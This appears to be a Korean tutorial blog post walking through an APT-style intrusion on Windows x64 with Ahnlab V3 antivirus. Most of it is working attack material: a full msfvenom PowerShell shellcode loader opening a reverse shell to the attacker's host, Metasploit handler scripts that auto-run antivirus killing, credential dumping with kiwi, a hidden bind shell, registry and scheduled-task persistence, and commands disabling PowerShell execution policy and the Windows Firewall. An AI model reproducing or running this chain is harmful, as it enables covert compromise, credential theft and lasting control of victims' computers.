[Kali] APT 공격 완벽 정리 - Powershell을 이용한 Anti Virus Bypass

대상 

Windows x64, Ahnlab V3

순서

1. MSFVenom을 이용한 Exploit 제작

아래 코드는 잘못된 것, Powershell을 통해 스크립트를 작성하도록 한다. 

root@kali:/# msfvenom -p windows/x64/shell/reverse_tcp -f psh lhost=칼리 IP주소 lport=443 

No platform was selected, choosing Msf::Module::Platform::Windows from the payload

No Arch selected, selecting Arch: x86_64 from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 510 bytes

Final size of psh file: 4338 bytes

$hSxnzsIlevDq = @"

[DllImport("kernel32.dll")]

public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]

public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

[DllImport("msvcrt.dll")]

public static extern IntPtr memset(IntPtr dest, uint src, uint count);

"@

$vRSgrNSOz = Add-Type -memberDefinition $hSxnzsIlevDq -Name "Win32" -namespace Win32Functions -passthru

[Byte[]] $yunBOKsEFdTh = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x0,0x0,0x0

$yunBOKsEFdTh += 0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2

$yunBOKsEFdTh += 0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48

$yunBOKsEFdTh += 0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7

$yunBOKsEFdTh += 0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c

$yunBOKsEFdTh += 0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41

$yunBOKsEFdTh += 0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52

$yunBOKsEFdTh += 0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78

$yunBOKsEFdTh += 0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b

$yunBOKsEFdTh += 0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67

$yunBOKsEFdTh += 0x48,0x1,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40

$yunBOKsEFdTh += 0x20,0x49,0x1,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41

$yunBOKsEFdTh += 0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48

$yunBOKsEFdTh += 0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1

$yunBOKsEFdTh += 0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45

$yunBOKsEFdTh += 0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49

$yunBOKsEFdTh += 0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40

$yunBOKsEFdTh += 0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x48,0x1

$yunBOKsEFdTh += 0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58

$yunBOKsEFdTh += 0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52

$yunBOKsEFdTh += 0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9

$yunBOKsEFdTh += 0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32

$yunBOKsEFdTh += 0x5f,0x33,0x32,0x0,0x0,0x41,0x56,0x49,0x89,0xe6

$yunBOKsEFdTh += 0x48,0x81,0xec,0xa0,0x1,0x0,0x0,0x49,0x89,0xe5

$yunBOKsEFdTh += 0x49,0xbc,0x2,0x0,0x1,0xbb,0xae,0x64,0x92,0xe0

$yunBOKsEFdTh += 0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba

$yunBOKsEFdTh += 0x4c,0x77,0x26,0x7,0xff,0xd5,0x4c,0x89,0xea,0x68

$yunBOKsEFdTh += 0x1,0x1,0x0,0x0,0x59,0x41,0xba,0x29,0x80,0x6b

$yunBOKsEFdTh += 0x0,0xff,0xd5,0x6a,0x5,0x41,0x5e,0x50,0x50,0x4d

$yunBOKsEFdTh += 0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89

$yunBOKsEFdTh += 0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea

$yunBOKsEFdTh += 0xf,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10

$yunBOKsEFdTh += 0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba

$yunBOKsEFdTh += 0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa

$yunBOKsEFdTh += 0x49,0xff,0xce,0x75,0xe5,0xe8,0x93,0x0,0x0,0x0

$yunBOKsEFdTh += 0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9

$yunBOKsEFdTh += 0x6a,0x4,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x2

$yunBOKsEFdTh += 0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7e,0x55

$yunBOKsEFdTh += 0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41

$yunBOKsEFdTh += 0x59,0x68,0x0,0x10,0x0,0x0,0x41,0x58,0x48,0x89

$yunBOKsEFdTh += 0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5

$yunBOKsEFdTh += 0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31

$yunBOKsEFdTh += 0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9

$yunBOKsEFdTh += 0x41,0xba,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8

$yunBOKsEFdTh += 0x0,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x0,0x40

$yunBOKsEFdTh += 0x0,0x0,0x41,0x58,0x6a,0x0,0x5a,0x41,0xba,0xb

$yunBOKsEFdTh += 0x2f,0xf,0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75

$yunBOKsEFdTh += 0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c

$yunBOKsEFdTh += 0xff,0xff,0xff,0x48,0x1,0xc3,0x48,0x29,0xc6,0x48

$yunBOKsEFdTh += 0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,0x6a,0x0

$yunBOKsEFdTh += 0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5

$TxqdMpKuSJyio = $vRSgrNSOz::VirtualAlloc(0,[Math]::Max($yunBOKsEFdTh.Length,0x1000),0x3000,0x40)

for ($ivBSSMaNmN=0;$ivBSSMaNmN -le ($yunBOKsEFdTh.Length-1);$ivBSSMaNmN++) {

  $vRSgrNSOz::memset([IntPtr]($TxqdMpKuSJyio.ToInt32()+$ivBSSMaNmN), $yunBOKsEFdTh[$ivBSSMaNmN], 1) | Out-Null

}

$vRSgrNSOz::CreateThread(0,0,$TxqdMpKuSJyio,0,0,0)

2. 스크립트 배포

취약한 Client 환경을 이용하여 Active X와 Javascript를 이용, Drive by Download 형태로 Powershell 스크립트가 실행되도록 하였음

3. MSFConsole 이용한 TCP 443포트 Listening

msfconsole -r powershell.rc

# cat /root/ powershell.rc

use multi/handler

set payload windows/meterpreter/reverse_tcp

set LPORT 443

set LHOST 0.0.0.0

set ExitOnSession false

set AutoRunScript multi_console_command -rc /root/AutoShell.rc

exploit -j

# cat /root/AutoShell.rc 

run post/windows/manage/migrate

run post/windows/manage/killav

run post/windows/gather/checkvm

use multi/handler

4. Meterpreter을 이용한 공격 사전작업

 4.1 프로세스 migrate

ps 명령어를 통해 타 프로세스로 이주하기 

migrate -p (pid)

4.2 윈도우, 아웃룩 등 Login Credential 추출하기

load kiwi

help

4.3 Session 수 늘리기

간혹 작업하다가 세션이 끊겨버리면 절망의 순간이 오기도 한다. 

미리 세션을 늘려놓도록 하자. 

use post/windows/manage/multi_meterpreter_inject

set SESSION (타겟 세션)

run

4.4 Powershell 보안 해제

##powershell 보안 해제

powershell Set-Executionpolicy unrestricted

4.5 Powershell Bind

##Bind Powershell 실행

upload bind.ps1

meterpreter> shell

powershell -nop -window hidden -noni -file c:\bind.ps1

4.6 시작 프로그램 등록(Registry)

## 부팅시 등록

reg setval -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -v ocwrev -d 'c:\cirrus.exe'

reg setval -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -v ocwrev2 -d 'c:\cirrus_rev.bat'

4.7 공격 유지를 위한 예약작업(schtasks) 등록

## 실시간 등록

upload cirrus.exe c:\

schtasks /create /tn cirrus /tr c:\cirrus.exe /sc minute /mo 3 #3분마다 한번씩 cirrus.exe 실행

#cirrus.exe는 bat2exe를 이용하여 invisible window로 실행되도록 하였음

4.8 Windows Firewall 해제

shell

  netsh firewall set opmode mode=disable

exit